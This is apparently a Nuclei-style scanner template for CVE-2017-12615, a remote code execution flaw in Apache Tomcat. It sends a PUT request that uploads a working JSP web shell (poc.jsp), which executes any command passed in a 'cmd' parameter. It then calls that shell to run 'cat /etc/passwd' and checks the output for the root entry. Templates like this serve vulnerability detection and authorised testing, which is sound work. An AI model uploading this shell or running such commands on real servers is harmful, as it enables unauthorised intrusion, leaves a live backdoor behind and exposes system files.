id: CVE-2017-12615

info:
  name: Apache Tomcat RCE
  author: pikpikcu
  severity: critical
  tags: cve,cve2017,apache,rce
  reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
  description: |
        By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
        This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
        However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
        Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.

requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
        <%@ page import="java.util.*,java.io.*"%>
        <%
        if (request.getParameter("cmd") != null) {
                out.println("Command: " + request.getParameter("cmd") + "<BR>");
                Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
                OutputStream os = p.getOutputStream();
                InputStream in = p.getInputStream();
                DataInputStream dis = new DataInputStream(in);
                String disr = dis.readLine();
                while ( disr != null ) {
                        out.println(disr);
                        disr = dis.readLine();
                        }
                }
        %>

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
      - type: status
        status:
          - 200